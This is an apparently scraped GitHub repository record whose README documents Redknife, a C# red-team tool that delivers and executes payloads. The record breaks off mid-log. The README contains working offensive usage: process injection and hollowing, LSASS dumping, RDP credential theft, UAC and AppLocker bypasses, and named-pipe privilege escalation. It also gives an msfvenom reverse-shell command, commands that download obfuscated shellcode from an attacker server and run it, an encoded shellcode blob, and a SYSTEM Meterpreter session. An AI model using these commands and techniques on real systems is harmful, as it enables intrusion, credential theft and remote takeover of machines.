{"id":19436589,"url":"https://github.com/ka7ana/redknife","last_synced_at":"2026-04-27T17:33:08.963Z","repository":{"id":223197299,"uuid":"759566311","full_name":"ka7ana/Redknife","owner":"ka7ana","description":"A command-line payload delivery and execution tool","archived":false,"fork":false,"pushed_at":"2024-02-28T13:55:34.000Z","size":55,"stargazers_count":2,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-07-02T02:07:00.088Z","etag":null,"topics":["command-line","command-line-tool","console","console-application","csharp","dotnet","offensive-security","offsec","osep","pen-300","pentesting-tools","red-team","red-team-tools","red-teaming"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ka7ana.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-02-18T22:08:40.000Z","updated_at":"2025-01-20T01:15:28.000Z","dependencies_parsed_at":"2024-02-18T23:28:31.152Z","dependency_job_id":"5ec6fade-9bd6-4c5e-b2e5-277098f7217c","html_url":"https://github.com/ka7ana/Redknife","commit_stats":null,"previous_names":["ka7ana/redknife"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ka7ana/Redknife","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ka7ana%2FRedknife","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ka7ana%2FRedknife/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ka7ana%2FRedknife/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ka7ana%2FRedknife/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ka7ana","download_url":"https://codeload.github.com/ka7ana/Redknife/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ka7ana%2FRedknife/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32348048,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-27T17:12:42.749Z","status":"ssl_error","status_checked_at":"2026-04-27T17:12:41.658Z","response_time":128,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["command-line","command-line-tool","console","console-application","csharp","dotnet","offensive-security","offsec","osep","pen-300","pentesting-tools","red-team","red-team-tools","red-teaming"],"created_at":"2024-11-10T15:11:56.814Z","updated_at":"2026-04-27T17:33:08.947Z","avatar_url":"https://github.com/ka7ana.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Redknife\n\nA command-line payload delivery and execution tool.\n\nRedknife obtains a payload from either a URL, file or directly via a command-line argument. This payload can contain encoded shell buffers, commands to execute etc. - functionality is dependent on the module specified.\n\nRedknife's main functionality is delivered via modules - when launching Redknife, a module is specified via the `--module` arg. Modules exist for spawning new threads, injecting into processes, process hollowing etc., as well as other utilities such as executing shell commands and creating PowerShell runspaces (allowing for constrained language mode bypass).\n\nRedknife can be run as an InstallUtil uninstaller, potentially allowing Redknife to bypass Applocker restrictions. Redknife can also be serialised by James Forshaw's DotNetToJScript tool, for use in CScript JavaScript/HTA files.\n\n## Parameters\n\nRedknife supports a number of different arguments.\n\n### General arguments\n\n- `--debug` - Sets the log level to debug (default log level is `INFO`).\n- `--quiet` - Suppresses all output. This option overrides the `--debug` flag.\n- `--help` - outputs the help info\n- `--evasion` - whether to try basic evasion techniques (such as sleep timer) to evade detection\n\n### Arguments to relating to the payload supplied to Redknife\n\n- `--file FILE` - Specifies the path of the file to load the payload from.\n- `--url URL` - Specifies a URL to load the payload from.\n- `--payload PAYLOAD` - Specifies the payload directly as an argument.\n- `--transforms TRANSFORMS` - the list of transformations to apply to the payload, comma delimited\n\n### Arguments instructing Redknife what to do\n\n- `--module MODULE` - Specifies the module to execute the payload on.\n- `--escalate ESCALATE_MODULE` - Specifies the name of the escalation type to perform to obtain privilege escalation.\n\n### Arguments used by specific modules\n\nNote that the functionality supplied by these arguments are dependent on the module used.\n\n- `--process PROCESS_NAME` - the process name to operate on. This is overridden if `--pid` is also specified.\n- `--pid PID` - the process ID to operate on. If specifying a `--pid` and a `--process` value, `--pid` overrides `--process`. \n- `--output-file FILE` - the output file to write to.\n- `--pipe-name NAME` - the name of the named pipe to operate on.\n- `--host-name HOST` - the host name to target in the specified module. (i.e. in the `hijack-remote-service` module)\n- `--service-name SERVICE` - the name of the service to target (i.e. in the `hijack-remote-service` module)\n\n## Modules\n\nRedknife has the following modules (as listed in `ComponentDefinitions.cs`):\n\n- `exec-ps` - Executes the payload as PowerShell script (maps to `Modules/PowerShellScript.cs`)\n- `new-thread` - spawns a new thread to execute the payload in (maps to `Modules/SpawnNewThread.cs`)\n- `process-inject` - Inject payload and create thread in process defined by `--pid` or `--process` parameter (maps to `Modules/SimpleProcessInjection.cs`)\n- `nt-process-inject` - Inject payload and create thread in process (using `NtDLL` methods) defined by `--pid` or `--process` parameter (maps to `Modules/NtProcessInjection.cs`)\n- `process-hollow` - Starts an instance of `svchost.exe`, which is then hollowed and replaced with payload (maps to `Modules/ProcessHollower.cs`)\n- `shell-cmd` - Execute a shell command, defined in the payload, as specified by either `--file`,` --url` or `--payload` parameters (maps to `Modules/ExecuteShellCommand.cs`)\n- `process-dump` - Dump a process' memory. Specify the ID or name of the process to dump via the `--pid` or `--process` arguments respectively. The output file can be controlled via `--output-file` (otherwise defaults to %TEMP% - maps to `Modules/ProcessMemoryDump.cs`)\n- `rdp-thief` - Inject the` RDPThief.dll` into running `mstsc` processes. The payload passed to the module must represent the path to the `RDPThief.dll` on the target system (this is not written by Redknife) (maps to `Modules/RDPThief.cs`)\n- `hijack-remote-service` - Lateral movement via reconfiguration of a remote service. Current user should have permission to edit the service on the remote host. Use `--service-name` to specify service, `--host-name` to specify remote machine (maps to `Modules/HijackRemoteService.cs`)\n\n## Escalation/UAC bypass\n\nRedknife has the following escalation/UAC bypass modules:\n\n- `FODHelper` - sets the appropriate registry keys and relaunches Redknife using the FOD Helper UAC bypass. All arguments passed to Redknife are preserved and passed to the re-launched instance of Redknife.\n- `NamedPipeSeImpersonate` - creates a named pipe (defined by `--pipe-name)\n\n## Transforms\n\nRedknife can apply the following transforms to a payload:\n\n- `base64` - base64 decodes the payload\n- `xor=VALUE` - XORs the payload with the specified string value\n- `caesar=VALUE` - performs a caesar shift on each byte in the payload. The shift value is determined by the value string, which must be numeric (although, can be negative).\n- `reverse` - reverses the payload\n\nThe order of the transforms is important, and must be done in the reverse order that the transformations were applied to the original payload.\n\nWhen specifying transforms, use a quoted string with comma-delimited transforms, i.e.: `--transforms \"base64,xor=foo,caesar=-5\"`\n\n## Specifying arguments in a text file\n\nSome situations might limit the parameters you can pass to an executable. As such, Redknife has the ability to read it's args from a text file. Args should be specified in the same format as they would normally be passed in cmd line args.\n\nRedknife has a predefined search order looking for arg files - if a file is found, the search finishes:\n\n1. Redknife.txt in the current directory (i.e. dir in which Redknife.exe is executing)\n2. ProcessName.txt in the current directory (i.e. in case executable has been renamed)\n3. `C:\\redknife.txt`\n4. `C:\\PROCESS_NAME.txt` (in case executable has been renamed)\n\n## DotNetToJScript\n\nThe Redknife executable can be encapsulated as a DotNetToJScript payload for inclusion in a JScript/VBScript/HTA file.\n\nAs Redknife loads a staged payload from a file or URL, a number of arguments must be supplied. As such, it is necessary to supply the `-s` parameter to `DotNetToJScript.exe` and include an additional JScript block that calls the required Redknife functionality.\n\nAs an example, to load a remote payload and execute it in a new thread within the Redknife process, the additional JScript would be supplied:\n\n```JavaScript\n// Define the args for Redknife\nvar RedknifeArgs = \"--url http://192.168.45.208:9000/Redknife.payload --module new-thread --transforms base64,xor=foo,caesar=-5\";\no.ParseArgumentsFromString(RedknifeArgs);\no.Run();\n```\n\nThese are passed to the created Redknife instance when created.\n\nAssuming the args above have been saved in a file named `redknife-args.txt`, the command to generate a Redknife JavaScript file is:\n\n```cmd\nDotNetToJScript.exe Redknife.exe -l JScript -v v4 -c Redknife.Redknife -s redknife-args.txt -o redknife.js\n```\n\nNote that the `-c Redknife.Redknife` arg is the name of the class that get's created by DotNetToJScript - in this case, it's an instance of class `Redknife`  within the `Redknife` namespace. Once the class has been created, the additional snipped of script (defined in `redknife-args.txt`)  calls `ParseArgumentsFromString` on the created `Redknife` class, passing in the string representation of the args. It then calls `Run` on the created class, which kicks off the main Redknife functionality.\n\nOnce `redknife.js` has been generated, any changes to the args to pass to Redknife can simply be made in the generated JS file itself, rather than generating a new file using DotNetToJScript.\n\nThe generated JS file can be tested from cscript.exe using the following command:\n\n```cmd\ncscript.exe redknife.js\n```\n\n### Notes\n\n- `cscript.exe` creates a 64-bit process - use a 64-bit payload and appropriate metasploit handler.\n\n## PowerShell Execution\n\nRedknife includes a PowerShell language execution module, which can execute PowerShell in environments where PS is restricted, or where PowerShell is limited to restricted language mode.\n\nTo invoke this module, use the `--module exec-ps` command line argument. The PowerShell code should be supplied as the payload to the module.\n\n**Note:** Aside from the normal transformations, if the PowerShell module detects that the payload is Base64 encoded (i.e. length is modulo 4 and matches Base64 regex) then it will attempt to Base64 decode the payload before execution.\n\n### Examples\n\n#### Script execution via `ps-cmd`\n\n```PowerShell\nRedknife.exe --module exec-ps --payload \"(Get-Content C:\\\\Tools\\\\PowerUp.ps1 -Raw) | IEX; Invoke-AllChecks | Out-File -FilePath C:\\\\Tools\\\\output.txt\" --debug\n```\n\nThe snippet above reads the `PowerUp.ps1` script from `C:\\\\Tools`, calls `Invoke-Expression` to add the PowerUp code to the context and then calls the `Invoke-AllChecks` method (added by the script). Output is redirected to a specific output file (although Redknife will print the output to the console, it isn't formatted as well as it would otherwise be.)\n\n#### Listing processes and displaying output\n\n```PowerShell\nRedknife.exe --module exec-ps --payload \"Get-Process | Format-Table | Out-String\" --debug\n```\n\nGets current running processes, formats the output in table form and converts to string.\n\n## Running Redknife as an InstallUtil uninstall script (LOLBin)\n\nYou can run `Redknife.exe` as a uninstall target for the Microsoft.NET framework `installutil.exe` utility (\"living off the land binary\" - LOLBin), which is located in directory `C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\`.\n\nInstallUtil will attempt to uninstall the executable specified in the command, and call the executable's `Uninstall` method. When running in this mode, you cannot pass arguments to Redknife - you must place a plain text argument file (containing the args to parse) in one of the predefined locations:\n\n1. The same local directory in which the Redknife executable is located\n2. The current Environment temp folder (returned by `Path.GetTempPath()`)\n3. The root `C:\\` directory\n\nFor each of these locations, Redknife first attempts to load a file named `Redknife.txt`, then if the name of the executing assembly is different (I.e. you have renamed Redknife.exe), `APPNAME.txt` (where APPNAME represents the name of the executable).\n\nRedknife can call any module you would normally be able to call from this method (previously only PowerShell commands could be executed).\n\n### Example Invocation \n\n#### Noisy - shows Redknife output on console\n\n```\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=false /U C:\\Windows\\Tasks\\Redknife.exe\n```\n\n## Dumping process memory\n\nRedknife has a module (`process-dump`) that allows it to dump a process' memory. The process to dump should be specified, either by name using the `--process` argument, or by ID using `--pid`. \n\nThis calls method `MiniDumpWriteDump` in the `Dbghelp` DLL.\n\nIf no `--output-file` is provided, the dump is saved to the same directory that Redknife is executing from with a filename in format: `Process_PROCESSNAME_DATETIME.dmp`. \n\nIf `--output-file` is a directory, the default file name ( `Process_PROCESSNAME_DATETIME.dmp`) is output to the specified directory. If `--output-file` specifies a file, the dump is written to the specified path.\n\n### Examples\n\n#### Dump lsass process by name to current directory\n\n```cmd\nC:\\temp\u003eRedknife.exe --module process-dump --process lsass --debug\n```\n\n#### Dump lsass process by ID to specified path\n\n```cmd\nRedknife.exe --module process-dump --pid 612 --output-file C:\\lsass.dmp\n```\n\n## Pre-Canned Examples\n\n### Executing PowerShell via InstallUtil Uninstall\n\nSave `Redknife.txt` file within same dir as Redknife executable:\n\n```\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U C:\\Temp\\Redknife.exe\n```\n\n### Priv Esc via Named Pipe and Process Hollowing\n\nMeterpreter payload generated using:\n\n```bash\nmsfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.45.215 LPORT=8080 -f raw \u003e Redknife.payload\n```\n\nRunning python web server to serve payload:\n\n```bash\n└─$ python -m http.server 9000\nServing HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...\n192.168.240.10 - - [15/Jan/2024 15:18:44] \"GET /Redknife.payload HTTP/1.1\" 200 -\n```\n\nRedknife invocation:\n\n```cmd\nC:\\Windows\\system32\u003eC:\\Temp\\Redknife.exe --debug --escalate NamedPipeSeImpersonate --pipe-name foobar --module process-hollow --url http://192.168.45.215:9000/Redknife.payload\n```\n\n### Priv Esc with raw payload and recursive invocation\n\nSome PrivEsc methods work with modules, other are a bit more fiddly. For instance, privesc with process hollowing works on some boxes, but not others. PrivEsc and shell-cmd works well (as the new process used to launch the shell cmd will use the elevated token), however this isn't really applicable if you don't have an executable or script that you can launch via a shell command (i.e. this requires you dropping a script on the disk before the Redknife invocation).\n\nIf you have a raw meterpreter payload and want to call this directly, use a recursive invocation:\n\n```cmd\nC:\\Temp\u003eRedknife.exe --debug --escalate NamedPipeSeImpersonate --pipe-name foobar --module shell-cmd --payload \"C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.228:9000/Redknife.payload\"\n```\n\nThis launches Redknife twice - the first instance performs the Priv Esc via NamedPipeSeImpersonation. The module for this instance is `shell-cmd`, and the payload is a raw payload containing the command to execute (which, in this case, is Redknife again). Once a privileged process connects to the named pipe, the first instance of Redknife copies the token and launches the command in the payload (which is Redknife), launching a new instance of Redknife with elevated privileges from the outset. In the above example, the second Redknife instance reads it's payload from a URL, which is then executed in a new thread in the current (elevated Redknife) process. From here, we can use any module we like without worrying whether the module is compatible with the escalation method.\n\n### Redknife as PrintSpoofer (PetitPotam) with EXE payload\n\n```\nC:\\Temp\u003eRedknife.exe --debug --escalate NamedPipeSeImpersonate --pipe-name \"test\\pipe\\spoolss\" --module shell-cmd --payload \"C:\\Temp\\met.exe\"\n```\n\nThen, from another Windows shell (on the same box):\n\n```\nC:\\\u003e C:\\path\\to\\SpoolSample.exe hostname hostname/pipe/test\n```\n\n### Redknife as PrintSpooler (PetitPotam) with obfuscated, remote shellcode payload\n\nGenerate a payload and obfuscate it (i.e. XOR, caesar shift etc).\n\nI.e.:\n\n```\n└─$ python rk-encode-payload.py --payload payloads/payload.ps1 --transforms=\"caesar=5,xor=foo\"\n[+] Read payload from file: payloads/payload.ps1\n[-]   Payload:\n0xfc,0x48,0x83,...0xa,0x41,0x89,0xda,0xff,0xd5\n\n[+] Transforms to apply caesar=5,xor=foo\n[-]   Applying caesar shift of 5\n[-]   XORing payload with phrase: foo\n[+] Transformed payloads:\n[-]   Raw byte array\n[103, 34, 231, 143, 154, 130, 183, 106, 106, 99, 41, 57, 32, 58, 56, 43, 89, 184, 48, 5, 34, 246, ...225, 176, 98, 181]\n----------------------------------------------------------------------------------------------------\n[-]   Formatted byte array\n0x67,0x22,0xe7,0x8f,0x9a,0x82,0xb7,0x6a,0x6a,0x63,0x29,0x39,0x20,0x3a,0x38,0x2b,0x59,0xb8,0x30,0x5,0x22...0x20,0xe1,0xb0,0x62,0xb5\n----------------------------------------------------------------------------------------------------\n[-]   Hex string\n6722e78f9a82b76a6a6...20e1b062b5\n----------------------------------------------------------------------------------------------------\n[-]   'X' hex string\n\\x67\\x22\\xe7\\x8f\\x9a\\x82\\xb7\\x6a\\x6a\\x63\\x29\\x39\\x20\\x3a\\x38\\x2b\\x59\\xb8\\x30\\x05\\x22\\xf6\\x38\\x0a\\x2b\\...\nx32\\xa7\\x3b\\x00\\x6a\\x38\\xaf\\x8a\\x44\\x40\\x60\\x20\\xe1\\xb0\\x62\\xb5\n----------------------------------------------------------------------------------------------------\n[-]   Hex dump\n67 22 e7 8f 9a 82 b7 6a 6a 63 29 39 20 3a 38 2b \n...\n2b 69 a7 ec aa 15 b1 32 a7 3b 00 6a 38 af 8a 44 \n40 60 20 e1 b0 62 b5 \n----------------------------------------------------------------------------------------------------\n[-]   Base64\nZyLnj5qCt2pqYyk5IDo4K1m4MAUi9jgKK/84ezQi9jhKK3vTKSAi9hg6NFmhK1mq1y4J52heQympqH0pYKmIlDgi9jhK9iguIDkiYLoE4BJydmh77BhqY2r/4+JqY2oi7KoWCiJps/8iezom9ipKKGm6jjQiYqE9UKEp9lbiK2m0K1mqIKmhdN4pYKlSgxWZN2c+T2IlWLkVuzIm9ipGKGm6DSn/dyIm9ipOKGm6IP9m6ykyK2m6IDIMODApOykxIDAi7p5KIDhrgzIpODAi9niBNmtrYg0iUI83KKwTCBwBFQUWYyk0K+GJKKOoNxNEamu1Pjci6Ik3OT1Zoz1ZqDc3KNBQPRHDY2pqY2u1i3tqY2pZWFhcUFRSVVZVVVlUWmowK+GpKKOqpmlqYz1ZqDc3CWc3KNAz6MukY2pqY2u1iw5qY2pbORkwURY5EAUEXyU7FildPgkdETMlGgMYCyk5AVYzDwUDFz4gWCccGxI9G1YXDVIlGSYDP1M7OSUGPxo1GzMzLDsmKjNTG1UQGlIAPylZWiJSMlQ4G1hZFQsSYyLhoDcwIDI9UKE3K9JqUcLmY2pqYzo3PiGjoZ81VS9rvCLhrQBgAiLhkABLOTgC41dqYyHhgwBmIDEh2RUkxeRqY2pqYrU9UKo3OSLhkD1ZqD1ZqDc3KKOoVGRy5mu17KoVQiKjoOJ3Y2oh2SaaXIpqY2pqYrUiYrsWYZ/AizVqY2o3OAAqOSHhsKmIcyGjo2p6Y2oh2TLGPoVqY2pqYrUi/jc3K+GDK+GZK+GwKKOqY0pqYyHhmCHQcfThgWpqY2prvCLnr0rloxbYDf9jK2mn7KoVsTKnOwBqOK+KREBgIOGwYrU=\n----------------------------------------------------------------------------------------------------\n```\n\nSave the Base64 output as `payloads/Redknife.payload` on server.\n\nNeed to launch Redknife from Redknife itself - first invocation executes the priv esc via PrintSpooler\n\n```\nC:\\Tools\u003eRedknife.exe --debug --escalate NamedPipeSeImpersonate --pipe-name \"test\\pipe\\spoolss\" --module shell-cmd --payload \"cmd.exe /C C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \\\"base64,xor=foo,caesar=-5\\\"\"\n[\u003e] Starting Redknife with options:\n[-]   - URL:\n[-]   - File:\n[-]   - Use Evasion: False\n[-]   - Escalate: NamedPipeSeImpersonate\n[-]   - Module: shell-cmd\n[-]   - PID:\n[-]   - Process Name:\n[-]   - Quiet: False\n[-]   - Debug: True\n[-]   - Help: False\n[+] Logging level: DEBUG\n[+] Loading payload from string provided: cmd.exe /C C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \"base64,xor=foo,caesar=-5\"\n[-]   OK! Payload contains 159 bytes\n[+] Payload:\n================================================================\ncmd.exe /C C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \"base64,xor=foo,caesar=-5\"\n================================================================\n```\n\nNow execute SpoolSample:\n\n```\nC:\\\u003e C:\\path\\to\\SpoolSample.exe hostname hostname/pipe/test\n```\n\nObserve output in Redknife:\n\n```\n[+] Performing privilege escalation\n[+] Executing NamedPipeSeImpersonate escalation...\n[-]   Creating named pipe: \\\\.\\pipe\\test\\pipe\\spoolss\n[-]   Connecting to named pipe: \\\\.\\pipe\\test\\pipe\\spoolss\n[-]   Connection received!\n[+] Client connected to named pipe '\\\\.\\pipe\\test\\pipe\\spoolss' with SID: S-1-5-18\n[-]   Escalation done\n[+] No payload transformations to apply\n[+] Executing shell command module...\n[\u003e] Launching executable: cmd.exe, with args: /C C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \"base64,xor=foo,caesar=-5\"\n[+] Current thread has impersonation privilege - executing process with token\n[+] System directory is: C:\\Windows\\system32\n[+] Impersonated user is: NT AUTHORITY\\SYSTEM\n[+] Calling CreateProcessWithTokenW - payload: cmd.exe /C C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \"base64,xor=foo,caesar=-5\"\n[\u003e] Executed with impersonated token: cmd.exe /C C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \"base64,xor=foo,caesar=-5\"\n```\n\nThe payload for the above points to Redknife, launching a new-thread module which downloads the payload from URL http://192.168.45.167:9000/payloads/Redknife.payload. This payload is also obfuscated, so the 2nd Redknife invocation transforms the payload appropriately on launch:\n\n```\n[\u003e] Starting Redknife with options:\n[-]   - URL: http://192.168.45.167:9000/payloads/Redknife.payload\n[-]   - File:\n[-]   - Transforms:\n[-]     [1]: base64\n[-]     [2]: xor=foo\n[-]     [3]: caesar=-5\n[-]   - Use Evasion: False\n[-]   - Escalate:\n[-]   - Module: new-thread\n[-]   - PID:\n[-]   - Process Name:\n[-]   - Quiet: False\n[-]   - Debug: True\n[-]   - Help: False\n[+] Logging level: DEBUG\n[+] Attempting to read payload from URL: http://192.168.45.167:9000/payloads/Redknife.payload\n[-]   OK! Payload contains 865 bytes\n[+] Payload:\n================================================================\nZyLnj5qCt2pq...qY2prvCLnr0rloxbYDf9jK2mn7KoVsTKnOwBqOK+KREBgIOGwYrU=\n\n================================================================\n[+] Transforming payload - 3 pending transformations\n[\u003e] Initial buffer, before transformations:\nBUFFER:\n5a 79 4c 6e 6a 35 71 43 74 32 70 71 59 79 6b 35\n...\n4f 4b 2b 4b 52 45 42 67 49 4f 47 77 59 72 55 3d\n0a\n[\u003e] Finalised payload buffer:\nBUFFER:\n67 22 e7 8f 9a 82 b7 6a 6a 63 29 39 20 3a 38 2b\n...\n2b 69 a7 ec aa 15 b1 32 a7 3b 00 6a 38 af 8a 44\n40 60 20 e1 b0 62 b5\n[-]   Transforming buffer - XOR with key: foo\n[\u003e] Finalised payload buffer:\nBUFFER:\n01 4d 88 e9 f5 ed d1 05 05 05 46 56 46 55 57 4d\n36 d7 56 6a 4d 90 57 65 4d 90 57 1d 5b 4d 90 57\n...\n4d 06 c8 8a c5 7a d7 5d c8 5d 6f 05 5e c0 e5 22\n2f 0f 46 8e df 04 da\n[-]   Transforming buffer - Caesar with key: -5\n[\u003e] Finalised payload buffer:\nBUFFER:\nfc 48 83 e4 f0 e8 cc 00 00 00 41 51 41 50 52 48\n...\n48 01 c3 85 c0 75 d2 58 c3 58 6a 00 59 bb e0 1d\n2a 0a 41 89 da ff d5\n[+] Finished transforming buffer: applied 3 transformations\n[\u003e] Spawning new thread for payload\n[-]   Allocating memory for payload, size: 647 bytes\n[-]   Copying payload to allocated memory\n[-]   Creating new thread to execute payload\n[\u003e] Waiting for thread execution\n```\n\nMeterpreter output:\n\n```\n[*] Meterpreter session 3 opened (192.168.45.167:443 -\u003e 192.168.164.100:52120) at 2024-02-08 15:33:13 +0000\n\nmeterpreter \u003e \nmeterpreter \u003e getuid\nServer username: NT AUTHORITY\\SYSTEM\n\n```\n\n### Downloading an obfuscated payload from URL\n\nGenerate a payload and obfuscate it (i.e. XOR, caesar shift etc).\n\nI.e.:\n\n```\n└─$ python rk-encode-payload.py --payload payloads/payload.ps1 --transforms=\"caesar=5,xor=foo\"\n[+] Read payload from file: payloads/payload.ps1\n[-]   Payload:\n0xfc,0x48,0x83,...0xa,0x41,0x89,0xda,0xff,0xd5\n\n[+] Transforms to apply caesar=5,xor=foo\n[-]   Applying caesar shift of 5\n[-]   XORing payload with phrase: foo\n[+] Transformed payloads:\n[-]   Raw byte array\n[103, 34, 231, 143, 154, 130, 183, 106, 106, 99, 41, 57, 32, 58, 56, 43, 89, 184, 48, 5, 34, 246, ...225, 176, 98, 181]\n----------------------------------------------------------------------------------------------------\n[-]   Formatted byte array\n0x67,0x22,0xe7,0x8f,0x9a,0x82,0xb7,0x6a,0x6a,0x63,0x29,0x39,0x20,0x3a,0x38,0x2b,0x59,0xb8,0x30,0x5,0x22...0x20,0xe1,0xb0,0x62,0xb5\n----------------------------------------------------------------------------------------------------\n[-]   Hex string\n6722e78f9a82b76a6a6...20e1b062b5\n----------------------------------------------------------------------------------------------------\n[-]   'X' hex string\n\\x67\\x22\\xe7\\x8f\\x9a\\x82\\xb7\\x6a\\x6a\\x63\\x29\\x39\\x20\\x3a\\x38\\x2b\\x59\\xb8\\x30\\x05\\x22\\xf6\\x38\\x0a\\x2b\\...\nx32\\xa7\\x3b\\x00\\x6a\\x38\\xaf\\x8a\\x44\\x40\\x60\\x20\\xe1\\xb0\\x62\\xb5\n----------------------------------------------------------------------------------------------------\n[-]   Hex dump\n67 22 e7 8f 9a 82 b7 6a 6a 63 29 39 20 3a 38 2b \n...\n2b 69 a7 ec aa 15 b1 32 a7 3b 00 6a 38 af 8a 44 \n40 60 20 e1 b0 62 b5 \n----------------------------------------------------------------------------------------------------\n[-]   Base64\nZyLnj5qCt2pqYyk5IDo4K1m4MAUi9jgKK/84ezQi9jhKK3vTKSAi9hg6NFmhK1mq1y4J52heQympqH0pYKmIlDgi9jhK9iguIDkiYLoE4BJydmh77BhqY2r/4+JqY2oi7KoWCiJps/8iezom9ipKKGm6jjQiYqE9UKEp9lbiK2m0K1mqIKmhdN4pYKlSgxWZN2c+T2IlWLkVuzIm9ipGKGm6DSn/dyIm9ipOKGm6IP9m6ykyK2m6IDIMODApOykxIDAi7p5KIDhrgzIpODAi9niBNmtrYg0iUI83KKwTCBwBFQUWYyk0K+GJKKOoNxNEamu1Pjci6Ik3OT1Zoz1ZqDc3KNBQPRHDY2pqY2u1i3tqY2pZWFhcUFRSVVZVVVlUWmowK+GpKKOqpmlqYz1ZqDc3CWc3KNAz6MukY2pqY2u1iw5qY2pbORkwURY5EAUEXyU7FildPgkdETMlGgMYCyk5AVYzDwUDFz4gWCccGxI9G1YXDVIlGSYDP1M7OSUGPxo1GzMzLDsmKjNTG1UQGlIAPylZWiJSMlQ4G1hZFQsSYyLhoDcwIDI9UKE3K9JqUcLmY2pqYzo3PiGjoZ81VS9rvCLhrQBgAiLhkABLOTgC41dqYyHhgwBmIDEh2RUkxeRqY2pqYrU9UKo3OSLhkD1ZqD1ZqDc3KKOoVGRy5mu17KoVQiKjoOJ3Y2oh2SaaXIpqY2pqYrUiYrsWYZ/AizVqY2o3OAAqOSHhsKmIcyGjo2p6Y2oh2TLGPoVqY2pqYrUi/jc3K+GDK+GZK+GwKKOqY0pqYyHhmCHQcfThgWpqY2prvCLnr0rloxbYDf9jK2mn7KoVsTKnOwBqOK+KREBgIOGwYrU=\n----------------------------------------------------------------------------------------------------\n```\n\nSave the Base64 output as `payloads/Redknife.payload` on server.\n\nInput transforms were `xor=foo,caesar=5` so reverse process will be `base64,caesar=-5,xor=foo`  to account for the base64 encoding used.\n\nLaunch Redknife:\n\n```\nZ:\\Redknife\\RedknifeApp\\bin\\x64\\Release\u003eRedknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \"base64,xor=foo,caesar=-5\"\n[\u003e] Starting Redknife with options:\n[-]   - URL: http://192.168.45.167:9000/payloads/Redknife.payload\n[-]   - File:\n[-]   - Transforms:\n[-]     [1]: base64\n[-]     [2]: xor=foo\n[-]     [3]: caesar=-5\n[-]   - Use Evasion: False\n[-]   - Escalate:\n[-]   - Module: new-thread\n[-]   - PID:\n[-]   - Process Name:\n[-]   - Quiet: False\n[-]   - Debug: True\n[-]   - Help: False\n[+] Logging level: DEBUG\n[+] Attempting to read payload from URL: http://192.168.45.167:9000/payloads/Redknife.payload\n[-]   OK! Payload contains 865 bytes\n[+] 